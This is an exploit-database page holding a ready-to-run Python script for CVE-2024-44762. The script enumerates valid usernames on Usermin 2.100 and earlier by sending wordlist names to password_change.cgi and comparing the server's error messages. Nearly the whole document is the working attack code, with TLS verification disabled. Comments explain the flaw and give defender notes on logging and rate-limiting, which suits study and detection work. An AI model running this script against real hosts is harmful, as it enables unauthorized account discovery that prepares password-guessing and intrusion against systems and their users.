## https://sploitus.com/exploit?id=PACKETSTORM:190222
# Exploit Title: Usermin 2.100 - Username Enumeration
    # Date: 10.02.2024 
    # Exploit Author: Kjesper 
    # Vendor Homepage: https://www.webmin.com/usermin.html
    # Software Link: https://github.com/webmin/usermin
    # Version: <= 2.100 
    # Tested on: Kali Linux 
    # CVE: CVE-2024-44762
    # https://senscybersecurity.nl/cve-2024-44762-explained/ 
    
    #!/usr/bin/python3
    # -*- coding: utf-8 -*-
    # Usermin - Username Enumeration (Version 2.100) 
    # Usage: UserEnumUsermin.py -u HOST -w WORDLIST_USERS
    # Example: UserEnumUsermin.py -u https://127.0.0.1:20000 -w users.txt 
    
    import requests
    import json
    import requests
    import argparse
    import sys
    from urllib3.exceptions import InsecureRequestWarning
    
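    # TLS verification is turned off for the requests below (verify=False), so
    # urllib3's per-request InsecureRequestWarning is silenced to keep output readable.
    requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

    # What this script checks (CVE-2024-44762, Usermin <= 2.100 per the header):
    # password_change.cgi answers a failed password change with different text
    # depending on whether the submitted login name exists. That difference in
    # the two messages below is the whole issue; a server that returns a single
    # generic failure message for both cases gives this check nothing to compare.
    #
    # Defender notes: every probe is a POST to /password_change.cgi with a
    # changing "user" field and a failing "old" password, sent one after another
    # from a single client. Where request logging is enabled this shows up as a
    # run of failed password changes for many different login names, which is a
    # reasonable signal to alert on or rate-limit. Restricting network access to
    # the Usermin port also limits who can reach the endpoint at all.
    WRONG_PASSWORD_MSG = "Failed to change password: The current password is incorrect."
    UNKNOWN_USER_MSG = "Failed to change password: Your login name was not found in the password file!"
    REQUEST_TIMEOUT_SECONDS = 10

    parser = argparse.ArgumentParser()

    parser.add_argument("-u", "--url", help = "use -u with the url to the host of usermin, EX: \"-u https://127.0.0.1:20000\"")
    parser.add_argument("-w", "--wordlist_users", help = "use -w with the username wordlist, EX: \"-w users.txt\"")

    args = parser.parse_args()

    # Validate the parsed values instead of counting sys.argv entries: the count
    # check rejected valid forms such as "--url=HOST --wordlist_users=FILE".
    if not args.url or not args.wordlist_users:
        print("Please provide the -u for URL and -w for the wordlist containing the usernames")
        print("EX: python3 UsernameEnum.py -u https://127.0.0.1:20000 -w users.txt")
        sys.exit(1)

    # The context manager closes the file even if reading fails. Blank lines and
    # trailing whitespace (e.g. CRLF line endings) are dropped so that an empty
    # "user" value is never submitted and misread as a "not vulnerable" answer.
    with open(args.wordlist_users, 'r') as usernameFile:
        usernameList = [line.strip() for line in usernameFile if line.strip()]

    # Strip a trailing slash so "-u https://host:20000/" does not yield "//password_change.cgi".
    targetUrl = '%s/password_change.cgi' % args.url.rstrip('/')
    newHeaders = {'Content-type': 'application/x-www-form-urlencoded', 'Referer': targetUrl}

    for username in usernameList:

        params = {'user':username, 'pam':'', 'expired':'2', 'old':'fakePassword', 'new1':'password', 'new2':'password'}
        try:
            # verify=False: the server certificate is not validated, so the response
            # text is only as trustworthy as the network path to the host.
            # NOTE(review): presumably disabled because Usermin installs often use a
            # self-signed certificate - confirm for the host under test.
            # The timeout keeps an unresponsive host from hanging the run indefinitely.
            response = requests.post(targetUrl, data=params, verify=False, headers=newHeaders, timeout=REQUEST_TIMEOUT_SECONDS)
        except requests.RequestException as err:
            print("Request to %s failed: %s" % (targetUrl, err))
            sys.exit(1)

        if WRONG_PASSWORD_MSG in response.text:
            # The server got as far as checking the old password, i.e. it
            # recognised the login name.
            print("Possible user found with username: " + username)
        elif UNKNOWN_USER_MSG not in response.text:
            # Neither known message came back: the host does not show the
            # distinguishable-response behaviour this check relies on (patched
            # build, different message text, or not a Usermin endpoint).
            print("Application is most likely not vulnerable and are therefore quitting.")
            sys.exit()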